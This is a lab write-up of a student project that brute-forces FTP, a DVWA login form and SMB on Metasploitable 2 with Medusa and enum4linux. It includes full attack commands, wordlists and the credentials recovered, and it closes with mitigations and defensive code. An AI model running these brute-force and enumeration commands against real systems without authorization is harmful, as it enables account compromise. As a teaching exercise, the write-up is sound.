This project presents a practical cybersecurity analysis focused on brute force attacks, developed in a controlled environment exclusively for educational purposes. Using the Medusa tool in conjunction with Kali Linux, real attack scenarios were simulated against the Metasploitable 2 system, covering three distinct attack vectors: FTP service (File Transfer Protocol), web form through DVWA (Damn Vulnerable Web Application), and SMB protocol (Server Message Block).
The environment was structured using isolated virtual machines in VirtualBox, configured in a host-only network to ensure total security during testing. Simplified and customized wordlists were developed specifically for educational purposes, allowing for clear demonstration of how authentication vulnerabilities can be exploited through automated attacks.
Beyond the practical execution of attacks, the project documents in detail the entire technical process, from initial environment setup to analysis of obtained results, including proposals for mitigation measures and security best practices. The main objective is to provide a deep understanding of authentication vulnerabilities, offensive security audit techniques, and most importantly, how to protect systems against these threats in the real world.
Warning: All activities were performed in an isolated and controlled environment, respecting ethical principles of responsible hacking.
- Understand the technical functioning of brute force attacks on different protocols
- Master the use of Kali Linux and the Medusa tool in practical scenarios
- Develop technical documentation skills in information security
- Identify common configuration and authentication failures in systems
- Learn to propose effective countermeasures to protect corporate environments
- Apply ethical hacking principles in a controlled environment
- Operating System: Kali Linux
- Main Tool: Medusa
- Testing Environment: Metasploitable 2 / DVWA
- Virtualization: VirtualBox
Before initiating any penetration testing, it is fundamental to establish communication between machines and identify the target. For this, the first step was to initialize the Metasploitable 2 virtual machine and obtain its IP address on the internal network.
With the Metasploitable VM running, the following command was used in the target machine's terminal to identify its IP address:
ip a
Identified IP address: 192.168.56.101
This IP will be used as the target in all subsequent attack scenarios.
After identifying the target's IP, a complete scan was performed to identify open ports and active services on the system. This step is fundamental to map the available attack surface.
Command executed:
nmap -sV -p 21,80,139,445 192.168.56.101
Parameter explanation:
- -sV: Detects versions of running services
- -p 21,80,139,445: Specifies the ports to be scanned:
  - 21: FTP (File Transfer Protocol)
  - 80: HTTP (Web)
  - 139: NetBIOS/SMB
  - 445: SMB (Server Message Block)
- 192.168.56.101: Target IP address
Scan result:
✅ Identified services:
- Port 21: vsftpd 2.3.4 (FTP)
- Port 80: Apache httpd 2.2.8 (HTTP)
- Port 139: Samba smbd 3.X (NetBIOS)
- Port 445: Samba smbd 3.X (SMB)
All identified services are active and accessible, confirming the attack vectors that will be exploited in subsequent scenarios.
Demonstrate how an attacker can compromise the FTP service through automated authentication attempts, exploiting weak passwords or unsafe patterns.
To perform the brute force attack, two customized wordlists were created containing common usernames and passwords. Since this is an educational environment, the lists were intentionally kept small to speed up the process and facilitate understanding.
Creating the user list:
echo -e 'user\nmsfadmin\nadmin\nroot' > users.txt
Content of users.txt file:
user
msfadmin
admin
root
Creating the password list:
echo -e '123456\npassword\nqwerty\nmsfadmin' > passwords.txt
Content of passwords.txt file:
123456
password
qwerty
msfadmin
Note: In real scenarios, attackers use much more extensive wordlists containing thousands or millions of possible combinations, including variations, dictionaries, and passwords leaked in data breaches.
With wordlists prepared and the FTP service confirmed, the attack was executed using the Medusa tool, which systematically tests all username and password combinations.
Command executed:
medusa -h 192.168.56.101 -U users.txt -P passwords.txt -M ftp -t 6
Parameter explanation:
- -h 192.168.56.101: Defines the target host (IP) of the attack
- -U users.txt: Specifies the file containing the user list
- -P passwords.txt: Specifies the file containing the password list
- -M ftp: Defines the attack module (FTP protocol)
- -t 6: Establishes 6 parallel threads to speed up the process
How it works:
Medusa performs login attempts by combining each user from the list with each password from the list, in an automated and parallel manner. The process continues until all combinations are tested or valid credentials are found.
Attack result:
✅ Compromised credentials:
- Username: msfadmin
- Password: msfadmin
To confirm the success of the attack, a legitimate connection to the FTP server was made using the obtained credentials.
Command executed:
ftp 192.168.56.101
When executing the command, the system prompted for authentication credentials:
Name: msfadmin
Password: msfadmin
✅ Access confirmed: Successful login to FTP server, demonstrating that the brute force attack was effective.
Demonstrate how attackers can compromise web applications through automated brute force attacks on authentication forms, exploiting weak passwords and the absence of protections against repeated login attempts.
With the Metasploitable server active, the presence of DVWA (Damn Vulnerable Web Application) was identified - an intentionally vulnerable web application designed for security training.
Identified application URL:
http://192.168.56.101/dvwa/login.php
To understand how the login form works and prepare the attack, technical analysis of the page was necessary using the browser's developer tools.
Using the "Inspect Element" function of the browser (F12), it was possible to identify crucial information about the form:
Information collected:
- HTTP Method: POST
- Target URL: /dvwa/login.php
- Form fields:
  - username: Username field
  - password: Password field
  - Login: Submit button
- Error message: When attempting an invalid login, the application returns the message: Login failed
Importance: The "Login failed" message will be used as a failure indicator for Medusa, allowing the tool to identify when an authentication attempt was unsuccessful and continue testing other combinations.
Identified form structure:
Following the same methodology as the FTP attack, customized wordlists were created for the web form attack.
Creating the user list:
echo -e "user\nmsfadmin\nadmin\nroot" > usersDVWA.txt
Content of usersDVWA.txt file:
user
msfadmin
admin
root
Creating the password list:
echo -e "123456\npassword\nqwerty\nmsfadmin" > passwordsDVWA.txt
Content of passwordsDVWA.txt file:
123456
password
qwerty
msfadmin
With all necessary information collected, the attack was executed using Medusa's HTTP module, specifically designed for web form attacks.
Command executed:
medusa -h 192.168.56.101 -U usersDVWA.txt -P passwordsDVWA.txt -M http -m DIR:/dvwa/login.php -m FORM:"username=USER&password=PASS&Login=Login" -m FAIL-LOGIN:"Login failed" -t 6
Detailed parameter explanation:
- -h 192.168.56.101: Defines the IP address of the target host (server)
- -U usersDVWA.txt: Specifies the file containing the list of usernames to be tested
- -P passwordsDVWA.txt: Specifies the file containing the list of passwords to be tested
- -M http: Defines the attack module for HTTP protocol (web forms)
- -m DIR:/dvwa/login.php: Specifies the directory/path of the login page in the web application
- -m FORM:"username=USER&password=PASS&Login=Login": Defines the POST form structure, where:
  - username=USER: Username field (USER will be replaced by each wordlist entry)
  - password=PASS: Password field (PASS will be replaced by each wordlist entry)
  - Login=Login: Submit button parameter
- -m FAIL-LOGIN:"Login failed": Defines the string indicating authentication failure (used to identify unsuccessful attempts)
- -t 6: Establishes 6 parallel threads to optimize attack speed
How it works:
Medusa performs HTTP POST requests to the login page, sending combinations of username and password. For each response received, the tool checks if it contains the string "Login failed":
- If the string is present: The attempt failed and Medusa continues testing
- If the string is absent: The credentials are valid and the attack was successful
Attack result:
✅ Tested credentials:
- Username: admin
- Password: password
To confirm the success of the attack, a manual login to the DVWA application was performed using the discovered credentials.
Validation steps:
- Access: http://192.168.56.101/dvwa/login.php
- Enter credentials:
  - Username: admin
  - Password: password
- Click "Login"
Result:
✅ Access confirmed: Successful login, redirected to DVWA administrative panel.
Demonstrate how attackers can compromise SMB (Server Message Block) file sharing services through user enumeration and automated brute force attacks, exploiting insecure configurations and weak credentials in corporate environments.
Unlike previous scenarios, attacking the SMB protocol requires an additional enumeration phase. This process allows identifying valid users, available shares, password policies, and other valuable information about the target system before starting the actual attack.
To perform this enumeration, the enum4linux tool was used, specialized in extracting information from Windows and Samba systems through the SMB protocol.
Command executed:
enum4linux -a 192.168.56.101 | tee enum4_output.txt
Detailed parameter explanation:
- enum4linux: Enumeration tool for SMB/CIFS systems
- -a: Executes all available enumeration options, including:
  - System user enumeration
  - Groups and members enumeration
  - Network shares listing
  - Password policy information
  - Operating system information
  - Domain/workgroup details
- 192.168.56.101: Target address
- | tee enum4_output.txt: Pipe operator that:
  - Displays output on terminal in real-time
  - Simultaneously saves all output to enum4_output.txt file for later analysis
Relevant information obtained:
After executing the command, the following were identified:
✅ Enumerated users:
- user
- msfadmin
- service
- root
- Other system users
✅ Available shares:
- tmp - Temporary directory
- IPC$ - Inter-process communication
- Other shares
✅ Security policies:
- No account lockout configured
- No password complexity required
- No password expiration
Enumeration importance: This phase is crucial as it provides a list of valid users, significantly reducing the number of attempts needed and increasing attack success rate. Instead of testing random users, the attacker focuses only on accounts that actually exist on the system.
Based on information collected during enumeration, more specific wordlists were created, prioritizing identified users.
Creating the user list:
echo -e 'user\nmsfadmin\nservice' > usersSMB.txt
Content of usersSMB.txt file:
user
msfadmin
service
Note: Different from previous scenarios, this wordlist was built based on real enumeration, containing only confirmed users on the target system.
Creating the password list:
echo -e 'password\n123456\nwelcome123\nmsfadmin' > passwordsSMB.txt
Content of passwordsSMB.txt file:
password
123456
welcome123
msfadmin
With wordlists prepared and users enumerated, the attack was executed using Medusa's smbnt module, specifically designed for SMB/CIFS protocol.
Command executed:
medusa -h 192.168.56.101 -U usersSMB.txt -P passwordsSMB.txt -M smbnt -t 2 -T 50
Detailed parameter explanation:
- -h 192.168.56.101: Defines the IP address of the target host (server)
- -U usersSMB.txt: Specifies the file containing the list of enumerated users
- -P passwordsSMB.txt: Specifies the file containing the list of passwords to be tested
- -M smbnt: Defines the attack module for SMB/CIFS protocol (Server Message Block)
- -t 2: Establishes 2 parallel threads (simultaneous connections)
  - Reduced value to avoid overloading the target server
  - Reduces chances of detection by monitoring systems
  - Recommended for SMB services that may be sensitive to multiple connections
- -T 50: Defines the timeout of 50 seconds for each connection attempt
  - Maximum wait time for each attempt before considering failure
  - Important for SMB services that may have higher latency
How it works:
Medusa performs authentication attempts on the SMB service by combining each user with each password. The SMB protocol uses NTLM authentication, and Medusa's smbnt module simulates this process to test credentials.
Strategic difference:
- Reduced threads (-t 2): Unlike FTP which used 6 threads, SMB is more sensitive and may block excessive connections
- Larger timeout (-T 50): SMB may be slower in responding to authentication compared to other protocols
Attack result:
✅ Compromised credentials:
- Username: msfadmin
- Password: msfadmin
To confirm the success of the attack and verify accessible resources, the smbclient tool was used to establish a legitimate connection to the server.
Command executed:
smbclient -L //192.168.56.101 -U msfadmin
Parameter explanation:
- smbclient: Command-line client for accessing SMB/CIFS resources
- -L: Lists all available shares on the server (List shares)
- //192.168.56.101: Server address in UNC format (Universal Naming Convention)
- -U msfadmin: Specifies the username for authentication
After executing the command, the password was requested:
Enter msfadmin's password: msfadmin
Result:
✅ Access confirmed: Connection successfully established, listing the following shares:
- Description: Establish minimum requirements for strong passwords across all systems.
- Implementation: Minimum 12 characters, combination of uppercase, lowercase, numbers, and symbols.
- Description: Limit authentication attempts within a determined period.
- Implementation: Temporary lockout after 3-5 failed attempts with increasing time. Use Fail2Ban for automation.
- Description: Add a second authentication layer beyond the password.
- Implementation: TOTP via apps (Google Authenticator), hardware tokens (YubiKey), mandatory for administrative accounts.
- Description: Record and analyze authentication attempts.
- Implementation: Logs of all attempts, alerts for multiple failures, minimum 90-day retention.
- Description: Prevent identification of valid users.
- Implementation: Generic error messages, disable user listing, block enumeration tools.
- Description: Limit access to critical services.
- Implementation: Firewall with IP whitelisting, VPN for remote access, VLANs for segregation.
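For the logging and alerting measure above, the following is an added example (not part of the original project) that scans FTP authentication logs for the pattern the FTP scenario produces: a burst of failures from one source, then a successful login. The log lines are constructed and modelled on vsftpd's log format; the address 192.168.56.102 for the Kali VM, the 5-failure threshold and the 60-second window are assumptions.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample lines modelled on vsftpd's log format (assumption).
# 192.168.56.102 is a hypothetical address for the attacking VM.
SAMPLE_LOG = """\
Mon Mar 10 10:14:30 2025 [pid 4090] [service] FAIL LOGIN: Client "192.168.56.1"
Mon Mar 10 10:14:41 2025 [pid 4092] [service] OK LOGIN: Client "192.168.56.1"
Mon Mar 10 10:15:01 2025 [pid 4101] [user] FAIL LOGIN: Client "192.168.56.102"
Mon Mar 10 10:15:01 2025 [pid 4103] [user] FAIL LOGIN: Client "192.168.56.102"
Mon Mar 10 10:15:02 2025 [pid 4105] [user] FAIL LOGIN: Client "192.168.56.102"
Mon Mar 10 10:15:02 2025 [pid 4107] [msfadmin] FAIL LOGIN: Client "192.168.56.102"
Mon Mar 10 10:15:03 2025 [pid 4109] [msfadmin] FAIL LOGIN: Client "192.168.56.102"
Mon Mar 10 10:15:03 2025 [pid 4111] [msfadmin] OK LOGIN: Client "192.168.56.102"
"""

LINE_RE = re.compile(
    r'^(?P<ts>\w{3} \w{3} [ \d]\d \d\d:\d\d:\d\d \d{4}) \[pid \d+\] '
    r'\[(?P<user>[^\]]*)\] (?P<result>OK|FAIL) LOGIN: Client "(?P<ip>[^"]+)"'
)

def analyze(log_text, threshold=5, window=timedelta(seconds=60)):
    """Return findings as (kind, source_ip, usernames) tuples, in log order."""
    failures = defaultdict(deque)  # ip -> (timestamp, user) failures inside the window
    flagged = set()                # ips already reported; kept for the whole run
    findings = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue               # not an authentication record
        ts = datetime.strptime(m["ts"], "%a %b %d %H:%M:%S %Y")
        ip, user = m["ip"], m["user"]
        recent = failures[ip]
        while recent and ts - recent[0][0] > window:
            recent.popleft()       # forget failures older than the window
        if m["result"] == "FAIL":
            recent.append((ts, user))
            if len(recent) >= threshold and ip not in flagged:
                flagged.add(ip)
                users = sorted({u for _, u in recent})
                findings.append(("BRUTE_FORCE", ip, users))
        elif ip in flagged:        # a success right after a burst: likely compromise
            findings.append(("SUCCESS_AFTER_BRUTE_FORCE", ip, [user]))
    return findings
```

The second finding type is the one that needs an immediate response: it means a guessed password worked, so the account should be treated as compromised rather than merely targeted.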
Main vulnerabilities: Weak credentials, plaintext transmission, no attempt limitation.
Recommendations:
- Migrate to SFTP/FTPS - Encrypt all transfers
- Configure Fail2Ban - Block after 3 failed attempts
- Restrict by IP - Whitelist authorized IPs
- Disable root/admin - Create specific FTP users
- Implement chroot - Isolate users in directories
Main vulnerabilities: Weak credentials, lack of CAPTCHA, revealing error messages.
Recommendations:
- Implement CAPTCHA - reCAPTCHA after 2-3 attempts
- Rate Limiting - Limit 5 attempts per 15 minutes
- WAF - ModSecurity, CloudFlare, or AWS WAF
- Generic messages - "Invalid credentials" only
- Account lockout - After 5 attempts with email recovery
- Security headers - HSTS, X-Frame-Options, force HTTPS
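The rate-limiting, lockout and generic-message recommendations above can be combined in one server-side check; the following is an added example, not code from DVWA or from the original project. The names LoginThrottle and attempt_login, the verify callback and the 60-second base lockout are assumptions; the 5-attempts-per-15-minutes limit comes from the list above.

```python
from collections import defaultdict, deque

GENERIC_ERROR = "Invalid credentials"  # same text for unknown user, bad password, lockout

class LoginThrottle:
    """Sliding-window failure counter with lockouts that double each time."""

    def __init__(self, max_attempts=5, window=15 * 60, base_lockout=60):
        self.max_attempts, self.window, self.base_lockout = max_attempts, window, base_lockout
        self.failures = defaultdict(deque)  # key -> timestamps of recent failures
        self.locked_until = {}              # key -> time the lockout ends
        self.lockouts = defaultdict(int)    # key -> lockouts so far (drives back-off)

    def is_locked(self, key, now):
        return now < self.locked_until.get(key, 0)

    def record_failure(self, key, now):
        recent = self.failures[key]
        recent.append(now)
        while now - recent[0] > self.window:  # drop failures older than the window
            recent.popleft()
        if len(recent) >= self.max_attempts:
            self.locked_until[key] = now + self.base_lockout * 2 ** self.lockouts[key]
            self.lockouts[key] += 1
            recent.clear()

    def reset(self, key):
        self.failures.pop(key, None)

def attempt_login(throttle, verify, username, password, ip, now):
    """verify(username, password) -> bool stands in for the app's credential check
    (hypothetical callback); now is a timestamp in seconds."""
    keys = [("user", username), ("ip", ip)]
    if any(throttle.is_locked(k, now) for k in keys):
        return False, GENERIC_ERROR  # locked: the password is not even evaluated
    if verify(username, password):
        # Clear only the account counter; keeping the IP counter stops one
        # valid login from wiping a source's failure history.
        throttle.reset(("user", username))
        return True, "OK"
    for k in keys:
        throttle.record_failure(k, now)
    return False, GENERIC_ERROR
```

Counting per source IP as well as per account matters here: sixteen guesses spread over four usernames never reach five failures on any single account. Per-account lockout can also be abused to lock out a legitimate user, which is why the list pairs it with a recovery path.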
This project was developed exclusively for educational purposes in a controlled environment.
IMPORTANT:
- All tests were performed on isolated virtual machines
- Never use these techniques on systems without explicit authorization
- Misuse of these techniques is illegal and may result in criminal consequences
- This material should not be used for malicious activities
Phablo Loureiro Alves





